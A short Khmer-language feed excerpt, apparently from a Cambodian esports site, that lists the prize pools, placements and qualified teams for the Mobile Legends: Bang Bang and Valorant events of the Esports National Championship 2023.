ជាមួយគ្នានេះដែល​ Esports National Championship 2023​ មានវិញ្ញាសារចំនួន​ពីររួមមាន​:

  • វិញ្ញាសារ Mobile Legends: Bang Bang
  • វិញ្ញាសារ Valorant

Esports National Championship 2023 Prize Pool (វិញ្ញាសារ MLBB )

Place$ USDParticipant
1st$1,500CFU Gaming
2nd$1,000DRoar Legends
3rd-4th$500BURN x FLASH
Empire Esport
5th-8thSee You Soon
Team Max
Team SV
PRO Esports

ក្រុមដែលបានចូលរួមជាមួយការប្រកួត

BURN x FLASHCFU GamingSee You SoonPRO Esports
QualifierQualifierQualifierQualifier

Empire EsportTeam MaxTeam SVDRoar Legends
QualifierQualifierQualifierQualifier

Esports National Championship 2023 Prize Pool (វិញ្ញាសារ Valorant)

Place$ USDParticipant
1st$1,500ReigN Esports
2nd$1,000AG Esports
3rd-4th$500Team Max
D-Roar

ក្រុមដែលបានចូលរួមជាមួយការប្រកួត

AG EsportsD-RoarReigN EsportsTeam Max
QualifierQualifierQualifierQualifier
]]>
https://camboesports.com/2024/03/3784/feed/ 0